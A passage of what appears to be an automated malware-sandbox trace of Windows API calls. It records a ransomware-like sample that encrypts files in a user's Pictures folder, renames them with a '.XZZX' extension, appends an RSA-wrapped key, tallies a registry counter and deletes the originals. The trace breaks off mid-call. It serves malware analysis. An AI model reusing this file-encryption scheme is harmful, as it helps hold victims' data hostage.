SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbbdb [0125.967] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.967] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbbe0 [0125.967] SetErrorMode (uMode=0x1) returned 0x1 [0125.968] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.968] OutputDebugStringW (lpOutputString="end") [0125.968] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.968] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0125.968] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce35a0) returned 1 [0125.968] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce35a0, dwCertEncodingType=0x1, pInfo=0x3d0d7b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d7e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d7f0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddf18) returned 1 [0125.968] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.969] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.969] CryptEncrypt (in: hKey=0x3cddf18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0125.969] CryptEncrypt (in: hKey=0x3cddf18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce3628*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce3628*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0125.969] WriteFile (in: hFile=0x604, lpBuffer=0x3ce3628*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce3628*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0125.969] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.969] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.969] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0125.969] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.969] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x60c) returned 0x0 [0125.969] RegQueryValueExW (in: hKey=0x60c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x98, lpcbData=0x420dfdc*=0x4) returned 0x0 [0125.969] RegCloseKey (hKey=0x60c) returned 0x0 [0125.969] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x60c) returned 0x0 [0125.969] RegSetValueExW (in: hKey=0x60c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x99, cbData=0x4 | out: lpData=0x420dfec*=0x99) returned 0x0 [0125.970] RegCloseKey (hKey=0x60c) returned 0x0 [0125.970] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.970] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.970] CloseHandle (hObject=0x604) returned 1 [0125.971] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.971] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.971] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oEKbZ-fUq6tWCg3E9gms.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oekbz-fuq6twcg3e9gms.gif")) returned 1 [0125.972] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oEKbZ-fUq6tWCg3E9gms.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oekbz-fuq6twcg3e9gms.gif")) returned 0 Thread: id = 417 os_tid = 0x994 [0126.008] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.008] lstrcpyW (in: lpString1=0x420f460, lpString2="pDGmGQvtKPZ_ns.gif" | out: lpString1="pDGmGQvtKPZ_ns.gif") returned="pDGmGQvtKPZ_ns.gif" [0126.008] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.008] SetErrorMode (uMode=0x1) returned 0x1 [0126.008] lstrcpyW (in: lpString1=0x420f860, lpString2="pDGmGQvtKPZ_ns.gif" | out: lpString1="pDGmGQvtKPZ_ns.gif") returned="pDGmGQvtKPZ_ns.gif" [0126.008] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf918eabe, Data2=0xa437, Data3=0x4584, Data4=([0]=0xaf, [1]=0xb0, [2]=0x5c, [3]=0xa6, [4]=0x2d, [5]=0xc9, [6]=0x5d, [7]=0x80))) returned 0x0 [0126.008] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pDGmGQvtKPZ_ns.gif") returned 61 [0126.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0126.008] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned 80 [0126.008] StrStrW (lpFirst="pDGmGQvtKPZ_ns.gif", lpSrch="XZZX") returned 0x0 [0126.008] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pDGmGQvtKPZ_ns.gif", dwFileAttributes=0x20) returned 1 [0126.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pDGmGQvtKPZ_ns.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pdgmgqvtkpz_ns.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0126.009] ReadFile (in: hFile=0x608, lpBuffer=0x3d0eeb0, nNumberOfBytesToRead=0xa07, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3d0eeb0*, lpNumberOfBytesRead=0x420e418*=0xa07, lpOverlapped=0x0) returned 1 [0126.010] CloseHandle (hObject=0x608) returned 1 [0126.010] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0126.010] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0126.011] SetErrorMode (uMode=0x1) returned 0x1 [0126.011] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0126.011] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1df90) returned 1 [0126.014] CryptGenKey (in: hProv=0x3d1df90, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0126.115] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.115] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.115] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.115] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0126.115] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0126.115] CryptReleaseContext (hProv=0x3d1df90, dwFlags=0x0) returned 1 [0126.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7ABC26D22C977F5CF918EABE30B863A4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7abc26d22c977f5cf918eabe30b863a4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x608 [0126.117] WriteFile (in: hFile=0x608, lpBuffer=0x3d0eeb0*, nNumberOfBytesToWrite=0xa07, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d0eeb0*, lpNumberOfBytesWritten=0x420e438*=0xa07, lpOverlapped=0x0) returned 1 [0126.117] SetFilePointer (in: hFile=0x608, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa07 [0126.118] WriteFile (in: hFile=0x608, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.118] SetFilePointer (in: hFile=0x608, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa0c [0126.118] WriteFile (in: hFile=0x608, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x24, lpOverlapped=0x0) returned 1 [0126.118] SetFilePointer (in: hFile=0x608, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa30 [0126.118] WriteFile (in: hFile=0x608, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.118] SetFilePointer (in: hFile=0x608, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa35 [0126.118] SetErrorMode (uMode=0x1) returned 0x1 [0126.118] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0126.118] OutputDebugStringW (lpOutputString="end") [0126.118] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.118] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0126.118] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1df90) returned 1 [0126.119] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1df90, dwCertEncodingType=0x1, pInfo=0x3d0d888*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d8b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d8c0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddf58) returned 1 [0126.119] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.120] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0126.120] CryptEncrypt (in: hKey=0x3cddf58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0126.120] CryptEncrypt (in: hKey=0x3cddf58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e018*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e018*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0126.120] WriteFile (in: hFile=0x608, lpBuffer=0x3d1e018*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e018*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0126.120] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0126.120] WriteFile (in: hFile=0x608, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.120] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0126.120] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0126.120] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x610) returned 0x0 [0126.121] RegQueryValueExW (in: hKey=0x610, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x99, lpcbData=0x420dfdc*=0x4) returned 0x0 [0126.121] RegCloseKey (hKey=0x610) returned 0x0 [0126.121] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x610) returned 0x0 [0126.121] RegSetValueExW (in: hKey=0x610, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x9a, cbData=0x4 | out: lpData=0x420dfec*=0x9a) returned 0x0 [0126.121] RegCloseKey (hKey=0x610) returned 0x0 [0126.121] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.121] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.122] CloseHandle (hObject=0x608) returned 1 [0126.123] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0126.124] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0126.124] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pDGmGQvtKPZ_ns.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pdgmgqvtkpz_ns.gif")) returned 1 [0126.125] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pDGmGQvtKPZ_ns.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pdgmgqvtkpz_ns.gif")) returned 0 Thread: id = 418 os_tid = 0x998 [0126.164] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.164] lstrcpyW (in: lpString1=0x420f460, lpString2="PTV-5E.jpg" | out: lpString1="PTV-5E.jpg") returned="PTV-5E.jpg" [0126.164] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.164] SetErrorMode (uMode=0x1) returned 0x1 [0126.164] lstrcpyW (in: lpString1=0x420f860, lpString2="PTV-5E.jpg" | out: lpString1="PTV-5E.jpg") returned="PTV-5E.jpg" [0126.164] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x30f3b58e, Data2=0x1bc8, Data3=0x4c83, Data4=([0]=0xb3, [1]=0x53, [2]=0x7a, [3]=0x2, [4]=0xbd, [5]=0x4c, [6]=0xbc, [7]=0xb0))) returned 0x0 [0126.164] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PTV-5E.jpg") returned 53 [0126.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0126.164] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F28BD0F0084D975830F3B58E0C6E7BA0.XZZX") returned 80 [0126.164] StrStrW (lpFirst="PTV-5E.jpg", lpSrch="XZZX") returned 0x0 [0126.164] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PTV-5E.jpg", dwFileAttributes=0x20) returned 1 [0126.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PTV-5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ptv-5e.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60c [0126.165] ReadFile (in: hFile=0x60c, lpBuffer=0x3d0eeb0, nNumberOfBytesToRead=0x24d1, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3d0eeb0*, lpNumberOfBytesRead=0x420e418*=0x24d1, lpOverlapped=0x0) returned 1 [0126.166] CloseHandle (hObject=0x60c) returned 1 [0126.166] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0126.166] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0126.167] SetErrorMode (uMode=0x1) returned 0x1 [0126.167] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0126.167] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e0a0) returned 1 [0126.170] CryptGenKey (in: hProv=0x3d1e0a0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0126.267] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.267] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.267] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.268] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0126.268] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0126.268] CryptReleaseContext (hProv=0x3d1e0a0, dwFlags=0x0) returned 1 [0126.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F28BD0F0084D975830F3B58E0C6E7BA0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f28bd0f0084d975830f3b58e0c6e7ba0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60c [0126.268] WriteFile (in: hFile=0x60c, lpBuffer=0x3d0eeb0*, nNumberOfBytesToWrite=0x24d1, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d0eeb0*, lpNumberOfBytesWritten=0x420e438*=0x24d1, lpOverlapped=0x0) returned 1 [0126.269] SetFilePointer (in: hFile=0x60c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24d1 [0126.269] WriteFile (in: hFile=0x60c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.269] SetFilePointer (in: hFile=0x60c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24d6 [0126.269] WriteFile (in: hFile=0x60c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x14, 